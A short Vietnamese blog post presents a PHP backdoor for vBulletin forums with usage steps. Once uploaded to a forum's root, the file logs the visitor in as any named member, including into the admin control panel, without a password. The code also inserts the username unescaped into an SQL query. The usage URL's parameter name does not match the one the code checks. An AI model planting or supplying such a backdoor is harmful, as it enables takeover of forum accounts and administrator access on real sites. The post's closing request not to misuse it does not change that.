New Post

Friday, March 9, 2012

Code này có tác dụng là khi upload vào thư mục root của forum VBB các bạn có khả năng đăng nhập vào nick bất cứ thành viên nào mà không cần password. Ngoài ra vào đc thẳng admincp mà ko cần gõ lại pass


<?php
if (isset($_GET['kenhdaihoc']))
{
define('THIS_SCRIPT', 'login');
require_once('./global.php');
require_once('./includes/functions_login.php');
$vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $_GET['kenhdaihoc'] . "'");
if (!$vbulletin->userinfo['userid']) die("Invalid username!");
else
{
vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);
vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);
exec_unstrike_user($_GET['kenhdaihoc']);
process_new_login('cplogin', TRUE, TRUE);
do_login_redirect();
}
}
?> 
Cách sử dụng

Copy đoạn code trên vào notepad save đuôi *.php (VD: fakepass.php)

Upload vào thư mục chứa forum ngang hàng với file index.php

Sau đó chạy link sau

http://domain.com/forum/*
.php?bd=username

Nhớ thay phần in đậm (domain và user)
Biết nhiều thì tốt nhưng đừng lấy đi phá người khác nhé :) 

[ST]

0 nhận xét:

Post a Comment